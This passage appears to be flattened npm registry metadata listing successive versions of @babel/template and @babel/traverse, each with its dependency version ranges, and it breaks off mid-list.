@babel/preset-modules 0.1.6-no-external-plugins Scope peer|@babel/core@^7.0.0-0 || ^8.0.0-0 <8.0.0 @babel/helper-plugin-utils@^7.0.0 @babel/types@^7.4.4 esutils@^2.0.2 @babel/template 7.1.2 @babel/code-frame@^7.0.0 @babel/parser@^7.1.2 @babel/types@^7.1.2 7.6.0 @babel/code-frame@^7.0.0 @babel/parser@^7.6.0 @babel/types@^7.6.0 7.27.2 @babel/code-frame@^7.27.1 @babel/parser@^7.27.2 @babel/types@^7.27.1 @babel/traverse 7.6.0 @babel/code-frame@^7.5.5 @babel/generator@^7.6.0 @babel/helper-function-name@^7.1.0 @babel/helper-split-export-declaration@^7.4.4 @babel/parser@^7.6.0 @babel/types@^7.6.0 debug@^4.1.0 
globals@^11.1.0 lodash@^4.17.13 7.6.2 @babel/code-frame@^7.5.5 @babel/generator@^7.6.2 @babel/helper-function-name@^7.1.0 @babel/helper-split-export-declaration@^7.4.4 @babel/parser@^7.6.2 @babel/types@^7.6.0 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.13 7.6.3 @babel/code-frame@^7.5.5 @babel/generator@^7.6.3 @babel/helper-function-name@^7.1.0 @babel/helper-split-export-declaration@^7.4.4 @babel/parser@^7.6.3 @babel/types@^7.6.3 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.13 7.7.0 @babel/code-frame@^7.5.5 @babel/generator@^7.7.0 @babel/helper-function-name@^7.7.0 @babel/helper-split-export-declaration@^7.7.0 @babel/parser@^7.7.0 @babel/types@^7.7.0 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.13 7.7.2 @babel/code-frame@^7.5.5 @babel/generator@^7.7.2 @babel/helper-function-name@^7.7.0 @babel/helper-split-export-declaration@^7.7.0 @babel/parser@^7.7.2 @babel/types@^7.7.2 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.13 7.7.4 @babel/code-frame@^7.5.5 @babel/generator@^7.7.4 @babel/helper-function-name@^7.7.4 @babel/helper-split-export-declaration@^7.7.4 @babel/parser@^7.7.4 @babel/types@^7.7.4 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.13 7.8.0 @babel/code-frame@^7.8.0 @babel/generator@^7.8.0 @babel/helper-function-name@^7.8.0 @babel/helper-split-export-declaration@^7.8.0 @babel/parser@^7.8.0 @babel/types@^7.8.0 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.13 7.8.3 @babel/code-frame@^7.8.3 @babel/generator@^7.8.3 @babel/helper-function-name@^7.8.3 @babel/helper-split-export-declaration@^7.8.3 @babel/parser@^7.8.3 @babel/types@^7.8.3 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.13 7.8.4 @babel/code-frame@^7.8.3 @babel/generator@^7.8.4 @babel/helper-function-name@^7.8.3 @babel/helper-split-export-declaration@^7.8.3 @babel/parser@^7.8.4 @babel/types@^7.8.3 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.13 7.8.6 @babel/code-frame@^7.8.3 @babel/generator@^7.8.6 @babel/helper-function-name@^7.8.3 @babel/helper-split-export-declaration@^7.8.3 @babel/parser@^7.8.6 @babel/types@^7.8.6 debug@^4.1.0 
globals@^11.1.0 lodash@^4.17.13 7.9.0 @babel/code-frame@^7.8.3 @babel/generator@^7.9.0 @babel/helper-function-name@^7.8.3 @babel/helper-split-export-declaration@^7.8.3 @babel/parser@^7.9.0 @babel/types@^7.9.0 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.13 7.9.5 @babel/code-frame@^7.8.3 @babel/generator@^7.9.5 @babel/helper-function-name@^7.9.5 @babel/helper-split-export-declaration@^7.8.3 @babel/parser@^7.9.0 @babel/types@^7.9.5 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.13 7.9.6 @babel/code-frame@^7.8.3 @babel/generator@^7.9.6 @babel/helper-function-name@^7.9.5 @babel/helper-split-export-declaration@^7.8.3 @babel/parser@^7.9.6 @babel/types@^7.9.6 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.13 7.10.0 @babel/code-frame@^7.8.3 @babel/generator@^7.10.0 @babel/helper-function-name@^7.9.5 @babel/helper-split-export-declaration@^7.8.3 @babel/parser@^7.10.0 @babel/types@^7.10.0 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.13 7.10.1 @babel/code-frame@^7.10.1 @babel/generator@^7.10.1 @babel/helper-function-name@^7.10.1 @babel/helper-split-export-declaration@^7.10.1 @babel/parser@^7.10.1 @babel/types@^7.10.1 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.13 7.10.3 @babel/code-frame@^7.10.3 @babel/generator@^7.10.3 @babel/helper-function-name@^7.10.3 @babel/helper-split-export-declaration@^7.10.1 @babel/parser@^7.10.3 @babel/types@^7.10.3 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.13 7.10.4 @babel/code-frame@^7.10.4 @babel/generator@^7.10.4 @babel/helper-function-name@^7.10.4 @babel/helper-split-export-declaration@^7.10.4 @babel/parser@^7.10.4 @babel/types@^7.10.4 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.13 7.10.5 @babel/code-frame@^7.10.4 @babel/generator@^7.10.5 @babel/helper-function-name@^7.10.4 @babel/helper-split-export-declaration@^7.10.4 @babel/parser@^7.10.5 @babel/types@^7.10.5 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.19 7.11.0 @babel/code-frame@^7.10.4 @babel/generator@^7.11.0 @babel/helper-function-name@^7.10.4 @babel/helper-split-export-declaration@^7.11.0 
@babel/parser@^7.11.0 @babel/types@^7.11.0 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.19 7.11.5 @babel/code-frame@^7.10.4 @babel/generator@^7.11.5 @babel/helper-function-name@^7.10.4 @babel/helper-split-export-declaration@^7.11.0 @babel/parser@^7.11.5 @babel/types@^7.11.5 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.19 7.12.0 @babel/code-frame@^7.10.4 @babel/generator@^7.12.0 @babel/helper-function-name@^7.10.4 @babel/helper-split-export-declaration@^7.11.0 @babel/parser@^7.12.0 @babel/types@^7.12.0 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.19 7.12.1 @babel/code-frame@^7.10.4 @babel/generator@^7.12.1 @babel/helper-function-name@^7.10.4 @babel/helper-split-export-declaration@^7.11.0 @babel/parser@^7.12.1 @babel/types@^7.12.1 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.19 7.12.5 @babel/code-frame@^7.10.4 @babel/generator@^7.12.5 @babel/helper-function-name@^7.10.4 @babel/helper-split-export-declaration@^7.11.0 @babel/parser@^7.12.5 @babel/types@^7.12.5 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.19 7.12.7 @babel/code-frame@^7.10.4 @babel/generator@^7.12.5 @babel/helper-function-name@^7.10.4 @babel/helper-split-export-declaration@^7.11.0 @babel/parser@^7.12.7 @babel/types@^7.12.7 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.19 7.12.8 @babel/code-frame@^7.10.4 @babel/generator@^7.12.5 @babel/helper-function-name@^7.10.4 @babel/helper-split-export-declaration@^7.11.0 @babel/parser@^7.12.7 @babel/types@^7.12.7 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.19 7.12.9 @babel/code-frame@^7.10.4 @babel/generator@^7.12.5 @babel/helper-function-name@^7.10.4 @babel/helper-split-export-declaration@^7.11.0 @babel/parser@^7.12.7 @babel/types@^7.12.7 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.19 7.12.10 @babel/code-frame@^7.10.4 @babel/generator@^7.12.10 @babel/helper-function-name@^7.10.4 @babel/helper-split-export-declaration@^7.11.0 @babel/parser@^7.12.10 @babel/types@^7.12.10 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.19 7.12.12 @babel/code-frame@^7.12.11 @babel/generator@^7.12.11 
@babel/helper-function-name@^7.12.11 @babel/helper-split-export-declaration@^7.12.11 @babel/parser@^7.12.11 @babel/types@^7.12.12 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.19 7.12.13 @babel/code-frame@^7.12.13 @babel/generator@^7.12.13 @babel/helper-function-name@^7.12.13 @babel/helper-split-export-declaration@^7.12.13 @babel/parser@^7.12.13 @babel/types@^7.12.13 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.19 7.12.17 @babel/code-frame@^7.12.13 @babel/generator@^7.12.17 @babel/helper-function-name@^7.12.13 @babel/helper-split-export-declaration@^7.12.13 @babel/parser@^7.12.17 @babel/types@^7.12.17 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.19 7.13.0 @babel/code-frame@^7.12.13 @babel/generator@^7.13.0 @babel/helper-function-name@^7.12.13 @babel/helper-split-export-declaration@^7.12.13 @babel/parser@^7.13.0 @babel/types@^7.13.0 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.19 7.13.13 @babel/code-frame@^7.12.13 @babel/generator@^7.13.9 @babel/helper-function-name@^7.12.13 @babel/helper-split-export-declaration@^7.12.13 @babel/parser@^7.13.13 @babel/types@^7.13.13 debug@^4.1.0 globals@^11.1.0 7.13.15 @babel/code-frame@^7.12.13 @babel/generator@^7.13.9 @babel/helper-function-name@^7.12.13 @babel/helper-split-export-declaration@^7.12.13 @babel/parser@^7.13.15 @babel/types@^7.13.14 debug@^4.1.0 globals@^11.1.0 7.13.17 @babel/code-frame@^7.12.13 @babel/generator@^7.13.16 @babel/helper-function-name@^7.12.13 @babel/helper-split-export-declaration@^7.12.13 @babel/parser@^7.13.16 @babel/types@^7.13.17 debug@^4.1.0 globals@^11.1.0 7.14.0 @babel/code-frame@^7.12.13 @babel/generator@^7.14.0 @babel/helper-function-name@^7.12.13 @babel/helper-split-export-declaration@^7.12.13 @babel/parser@^7.14.0 @babel/types@^7.14.0 debug@^4.1.0 globals@^11.1.0 7.14.2 @babel/code-frame@^7.12.13 @babel/generator@^7.14.2 @babel/helper-function-name@^7.14.2 @babel/helper-split-export-declaration@^7.12.13 @babel/parser@^7.14.2 @babel/types@^7.14.2 debug@^4.1.0 globals@^11.1.0 7.14.5 
@babel/code-frame@^7.14.5 @babel/generator@^7.14.5 @babel/helper-function-name@^7.14.5 @babel/helper-hoist-variables@^7.14.5 @babel/helper-split-export-declaration@^7.14.5 @babel/parser@^7.14.5 @babel/types@^7.14.5 debug@^4.1.0 globals@^11.1.0 7.14.7 @babel/code-frame@^7.14.5 @babel/generator@^7.14.5 @babel/helper-function-name@^7.14.5 @babel/helper-hoist-variables@^7.14.5 @babel/helper-split-export-declaration@^7.14.5 @babel/parser@^7.14.7 @babel/types@^7.14.5 debug@^4.1.0 globals@^11.1.0 7.14.8 @babel/code-frame@^7.14.5 @babel/generator@^7.14.8 @babel/helper-function-name@^7.14.5 @babel/helper-hoist-variables@^7.14.5 @babel/helper-split-export-declaration@^7.14.5 @babel/parser@^7.14.8 @babel/types@^7.14.8 debug@^4.1.0 globals@^11.1.0 7.14.9 @babel/code-frame@^7.14.5 @babel/generator@^7.14.9 @babel/helper-function-name@^7.14.5 @babel/helper-hoist-variables@^7.14.5 @babel/helper-split-export-declaration@^7.14.5 @babel/parser@^7.14.9 @babel/types@^7.14.9 debug@^4.1.0 globals@^11.1.0 7.15.0 @babel/code-frame@^7.14.5 @babel/generator@^7.15.0 @babel/helper-function-name@^7.14.5 @babel/helper-hoist-variables@^7.14.5 @babel/helper-split-export-declaration@^7.14.5 @babel/parser@^7.15.0 @babel/types@^7.15.0 debug@^4.1.0 globals@^11.1.0 7.15.4 @babel/code-frame@^7.14.5 @babel/generator@^7.15.4 @babel/helper-function-name@^7.15.4 @babel/helper-hoist-variables@^7.15.4 @babel/helper-split-export-declaration@^7.15.4 @babel/parser@^7.15.4 @babel/types@^7.15.4 debug@^4.1.0 globals@^11.1.0 7.16.0 @babel/code-frame@^7.16.0 @babel/generator@^7.16.0 @babel/helper-function-name@^7.16.0 @babel/helper-hoist-variables@^7.16.0 @babel/helper-split-export-declaration@^7.16.0 @babel/parser@^7.16.0 @babel/types@^7.16.0 debug@^4.1.0 globals@^11.1.0 7.16.3 @babel/code-frame@^7.16.0 @babel/generator@^7.16.0 @babel/helper-function-name@^7.16.0 @babel/helper-hoist-variables@^7.16.0 @babel/helper-split-export-declaration@^7.16.0 @babel/parser@^7.16.3 @babel/types@^7.16.0 debug@^4.1.0 
globals@^11.1.0 7.16.5 @babel/code-frame@^7.16.0 @babel/generator@^7.16.5 @babel/helper-environment-visitor@^7.16.5 @babel/helper-function-name@^7.16.0 @babel/helper-hoist-variables@^7.16.0 @babel/helper-split-export-declaration@^7.16.0 @babel/parser@^7.16.5 @babel/types@^7.16.0 debug@^4.1.0 globals@^11.1.0 7.16.7 @babel/code-frame@^7.16.7 @babel/generator@^7.16.7 @babel/helper-environment-visitor@^7.16.7 @babel/helper-function-name@^7.16.7 @babel/helper-hoist-variables@^7.16.7 @babel/helper-split-export-declaration@^7.16.7 @babel/parser@^7.16.7 @babel/types@^7.16.7 debug@^4.1.0 globals@^11.1.0 7.16.8 @babel/code-frame@^7.16.7 @babel/generator@^7.16.8 @babel/helper-environment-visitor@^7.16.7 @babel/helper-function-name@^7.16.7 @babel/helper-hoist-variables@^7.16.7 @babel/helper-split-export-declaration@^7.16.7 @babel/parser@^7.16.8 @babel/types@^7.16.8 debug@^4.1.0 globals@^11.1.0 7.16.10 @babel/code-frame@^7.16.7 @babel/generator@^7.16.8 @babel/helper-environment-visitor@^7.16.7 @babel/helper-function-name@^7.16.7 @babel/helper-hoist-variables@^7.16.7 @babel/helper-split-export-declaration@^7.16.7 @babel/parser@^7.16.10 @babel/types@^7.16.8 debug@^4.1.0 globals@^11.1.0 7.17.0 @babel/code-frame@^7.16.7 @babel/generator@^7.17.0 @babel/helper-environment-visitor@^7.16.7 @babel/helper-function-name@^7.16.7 @babel/helper-hoist-variables@^7.16.7 @babel/helper-split-export-declaration@^7.16.7 @babel/parser@^7.17.0 @babel/types@^7.17.0 debug@^4.1.0 globals@^11.1.0 7.17.3 @babel/code-frame@^7.16.7 @babel/generator@^7.17.3 @babel/helper-environment-visitor@^7.16.7 @babel/helper-function-name@^7.16.7 @babel/helper-hoist-variables@^7.16.7 @babel/helper-split-export-declaration@^7.16.7 @babel/parser@^7.17.3 @babel/types@^7.17.0 debug@^4.1.0 globals@^11.1.0 7.17.9 @babel/code-frame@^7.16.7 @babel/generator@^7.17.9 @babel/helper-environment-visitor@^7.16.7 @babel/helper-function-name@^7.17.9 @babel/helper-hoist-variables@^7.16.7 @babel/helper-split-export-declaration@^7.16.7 
@babel/parser@^7.17.9 @babel/types@^7.17.0 debug@^4.1.0 globals@^11.1.0 7.17.10 @babel/code-frame@^7.16.7 @babel/generator@^7.17.10 @babel/helper-environment-visitor@^7.16.7 @babel/helper-function-name@^7.17.9 @babel/helper-hoist-variables@^7.16.7 @babel/helper-split-export-declaration@^7.16.7 @babel/parser@^7.17.10 @babel/types@^7.17.10 debug@^4.1.0 globals@^11.1.0 7.17.12 @babel/code-frame@^7.16.7 @babel/generator@^7.17.12 @babel/helper-environment-visitor@^7.16.7 @babel/helper-function-name@^7.17.9 @babel/helper-hoist-variables@^7.16.7 @babel/helper-split-export-declaration@^7.16.7 @babel/parser@^7.17.12 @babel/types@^7.17.12 debug@^4.1.0 globals@^11.1.0 7.18.0 @babel/code-frame@^7.16.7 @babel/generator@^7.18.0 @babel/helper-environment-visitor@^7.16.7 @babel/helper-function-name@^7.17.9 @babel/helper-hoist-variables@^7.16.7 @babel/helper-split-export-declaration@^7.16.7 @babel/parser@^7.18.0 @babel/types@^7.18.0 debug@^4.1.0 globals@^11.1.0 7.18.2 @babel/code-frame@^7.16.7 @babel/generator@^7.18.2 @babel/helper-environment-visitor@^7.18.2 @babel/helper-function-name@^7.17.9 @babel/helper-hoist-variables@^7.16.7 @babel/helper-split-export-declaration@^7.16.7 @babel/parser@^7.18.0 @babel/types@^7.18.2 debug@^4.1.0 globals@^11.1.0 7.18.5 @babel/code-frame@^7.16.7 @babel/generator@^7.18.2 @babel/helper-environment-visitor@^7.18.2 @babel/helper-function-name@^7.17.9 @babel/helper-hoist-variables@^7.16.7 @babel/helper-split-export-declaration@^7.16.7 @babel/parser@^7.18.5 @babel/types@^7.18.4 debug@^4.1.0 globals@^11.1.0 7.18.6 @babel/code-frame@^7.18.6 @babel/generator@^7.18.6 @babel/helper-environment-visitor@^7.18.6 @babel/helper-function-name@^7.18.6 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.18.6 @babel/types@^7.18.6 debug@^4.1.0 globals@^11.1.0 7.18.8 @babel/code-frame@^7.18.6 @babel/generator@^7.18.7 @babel/helper-environment-visitor@^7.18.6 @babel/helper-function-name@^7.18.6 
@babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.18.8 @babel/types@^7.18.8 debug@^4.1.0 globals@^11.1.0 7.18.9 @babel/code-frame@^7.18.6 @babel/generator@^7.18.9 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.18.9 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.18.9 @babel/types@^7.18.9 debug@^4.1.0 globals@^11.1.0 7.18.10 @babel/code-frame@^7.18.6 @babel/generator@^7.18.10 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.18.9 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.18.10 @babel/types@^7.18.10 debug@^4.1.0 globals@^11.1.0 7.18.11 @babel/code-frame@^7.18.6 @babel/generator@^7.18.10 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.18.9 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.18.11 @babel/types@^7.18.10 debug@^4.1.0 globals@^11.1.0 7.18.13 @babel/code-frame@^7.18.6 @babel/generator@^7.18.13 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.18.9 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.18.13 @babel/types@^7.18.13 debug@^4.1.0 globals@^11.1.0 7.19.0 @babel/code-frame@^7.18.6 @babel/generator@^7.19.0 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.19.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.19.0 @babel/types@^7.19.0 debug@^4.1.0 globals@^11.1.0 7.19.1 @babel/code-frame@^7.18.6 @babel/generator@^7.19.0 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.19.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.19.1 @babel/types@^7.19.0 debug@^4.1.0 globals@^11.1.0 7.19.3 @babel/code-frame@^7.18.6 @babel/generator@^7.19.3 
@babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.19.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.19.3 @babel/types@^7.19.3 debug@^4.1.0 globals@^11.1.0 7.19.4 @babel/code-frame@^7.18.6 @babel/generator@^7.19.4 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.19.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.19.4 @babel/types@^7.19.4 debug@^4.1.0 globals@^11.1.0 7.19.6 @babel/code-frame@^7.18.6 @babel/generator@^7.19.6 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.19.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.19.6 @babel/types@^7.19.4 debug@^4.1.0 globals@^11.1.0 7.20.0 @babel/code-frame@^7.18.6 @babel/generator@^7.20.0 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.19.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.20.0 @babel/types@^7.20.0 debug@^4.1.0 globals@^11.1.0 7.20.1 @babel/code-frame@^7.18.6 @babel/generator@^7.20.1 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.19.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.20.1 @babel/types@^7.20.0 debug@^4.1.0 globals@^11.1.0 7.20.5 @babel/code-frame@^7.18.6 @babel/generator@^7.20.5 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.19.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.20.5 @babel/types@^7.20.5 debug@^4.1.0 globals@^11.1.0 7.20.7 @babel/code-frame@^7.18.6 @babel/generator@^7.20.7 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.19.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.20.7 @babel/types@^7.20.7 debug@^4.1.0 globals@^11.1.0 7.20.8 
@babel/code-frame@^7.18.6 @babel/generator@^7.20.7 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.19.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.20.7 @babel/types@^7.20.7 debug@^4.1.0 globals@^11.1.0 7.20.10 @babel/code-frame@^7.18.6 @babel/generator@^7.20.7 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.19.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.20.7 @babel/types@^7.20.7 debug@^4.1.0 globals@^11.1.0 7.20.12 @babel/code-frame@^7.18.6 @babel/generator@^7.20.7 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.19.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.20.7 @babel/types@^7.20.7 debug@^4.1.0 globals@^11.1.0 7.20.13 @babel/code-frame@^7.18.6 @babel/generator@^7.20.7 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.19.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.20.13 @babel/types@^7.20.7 debug@^4.1.0 globals@^11.1.0 7.21.0 @babel/code-frame@^7.18.6 @babel/generator@^7.21.0 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.21.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.21.0 @babel/types@^7.21.0 debug@^4.1.0 globals@^11.1.0 7.21.2 @babel/code-frame@^7.18.6 @babel/generator@^7.21.1 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.21.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.21.2 @babel/types@^7.21.2 debug@^4.1.0 globals@^11.1.0 7.21.3 @babel/code-frame@^7.18.6 @babel/generator@^7.21.3 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.21.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.21.3 
@babel/types@^7.21.3 debug@^4.1.0 globals@^11.1.0 7.21.4 @babel/code-frame@^7.21.4 @babel/generator@^7.21.4 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.21.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.21.4 @babel/types@^7.21.4 debug@^4.1.0 globals@^11.1.0 7.21.5 @babel/code-frame@^7.21.4 @babel/generator@^7.21.5 @babel/helper-environment-visitor@^7.21.5 @babel/helper-function-name@^7.21.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.21.5 @babel/types@^7.21.5 debug@^4.1.0 globals@^11.1.0 7.22.0 @babel/code-frame@^7.21.4 @babel/generator@^7.22.0 @babel/helper-environment-visitor@^7.21.5 @babel/helper-function-name@^7.21.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.22.0 @babel/types@^7.22.0 debug@^4.1.0 globals@^11.1.0 7.22.1 @babel/code-frame@^7.21.4 @babel/generator@^7.22.0 @babel/helper-environment-visitor@^7.22.1 @babel/helper-function-name@^7.21.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.22.0 @babel/types@^7.22.0 debug@^4.1.0 globals@^11.1.0 7.22.4 @babel/code-frame@^7.21.4 @babel/generator@^7.22.3 @babel/helper-environment-visitor@^7.22.1 @babel/helper-function-name@^7.21.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.22.4 @babel/types@^7.22.4 debug@^4.1.0 globals@^11.1.0 7.22.5 @babel/code-frame@^7.22.5 @babel/generator@^7.22.5 @babel/helper-environment-visitor@^7.22.5 @babel/helper-function-name@^7.22.5 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.5 @babel/parser@^7.22.5 @babel/types@^7.22.5 debug@^4.1.0 globals@^11.1.0 7.22.6 @babel/code-frame@^7.22.5 @babel/generator@^7.22.5 @babel/helper-environment-visitor@^7.22.5 @babel/helper-function-name@^7.22.5 @babel/helper-hoist-variables@^7.22.5 
@babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.22.6 @babel/types@^7.22.5 debug@^4.1.0 globals@^11.1.0 7.22.7 @babel/code-frame@^7.22.5 @babel/generator@^7.22.7 @babel/helper-environment-visitor@^7.22.5 @babel/helper-function-name@^7.22.5 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.22.7 @babel/types@^7.22.5 debug@^4.1.0 globals@^11.1.0 7.22.8 @babel/code-frame@^7.22.5 @babel/generator@^7.22.7 @babel/helper-environment-visitor@^7.22.5 @babel/helper-function-name@^7.22.5 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.22.7 @babel/types@^7.22.5 debug@^4.1.0 globals@^11.1.0 7.22.10 @babel/code-frame@^7.22.10 @babel/generator@^7.22.10 @babel/helper-environment-visitor@^7.22.5 @babel/helper-function-name@^7.22.5 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.22.10 @babel/types@^7.22.10 debug@^4.1.0 globals@^11.1.0 7.22.11 @babel/code-frame@^7.22.10 @babel/generator@^7.22.10 @babel/helper-environment-visitor@^7.22.5 @babel/helper-function-name@^7.22.5 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.22.11 @babel/types@^7.22.11 debug@^4.1.0 globals@^11.1.0 7.22.15 @babel/code-frame@^7.22.13 @babel/generator@^7.22.15 @babel/helper-environment-visitor@^7.22.5 @babel/helper-function-name@^7.22.5 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.22.15 @babel/types@^7.22.15 debug@^4.1.0 globals@^11.1.0 7.22.17 @babel/code-frame@^7.22.13 @babel/generator@^7.22.15 @babel/helper-environment-visitor@^7.22.5 @babel/helper-function-name@^7.22.5 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.22.16 @babel/types@^7.22.17 debug@^4.1.0 globals@^11.1.0 7.22.18 @babel/code-frame@^7.22.13 @babel/generator@^7.22.15 @babel/helper-environment-visitor@^7.22.5 
@babel/helper-function-name@^7.22.5 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.22.16 @babel/types@^7.22.18 debug@^4.1.0 globals@^11.1.0 7.22.19 @babel/code-frame@^7.22.13 @babel/generator@^7.22.15 @babel/helper-environment-visitor@^7.22.5 @babel/helper-function-name@^7.22.5 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.22.16 @babel/types@^7.22.19 debug@^4.1.0 globals@^11.1.0 7.22.20 @babel/code-frame@^7.22.13 @babel/generator@^7.22.15 @babel/helper-environment-visitor@^7.22.20 @babel/helper-function-name@^7.22.5 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.22.16 @babel/types@^7.22.19 debug@^4.1.0 globals@^11.1.0 7.23.0 @babel/code-frame@^7.22.13 @babel/generator@^7.23.0 @babel/helper-environment-visitor@^7.22.20 @babel/helper-function-name@^7.23.0 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.23.0 @babel/types@^7.23.0 debug@^4.1.0 globals@^11.1.0 7.23.2 @babel/code-frame@^7.22.13 @babel/generator@^7.23.0 @babel/helper-environment-visitor@^7.22.20 @babel/helper-function-name@^7.23.0 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.23.0 @babel/types@^7.23.0 debug@^4.1.0 globals@^11.1.0 7.23.3 @babel/code-frame@^7.22.13 @babel/generator@^7.23.3 @babel/helper-environment-visitor@^7.22.20 @babel/helper-function-name@^7.23.0 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.23.3 @babel/types@^7.23.3 debug@^4.1.0 globals@^11.1.0 7.23.4 @babel/code-frame@^7.23.4 @babel/generator@^7.23.4 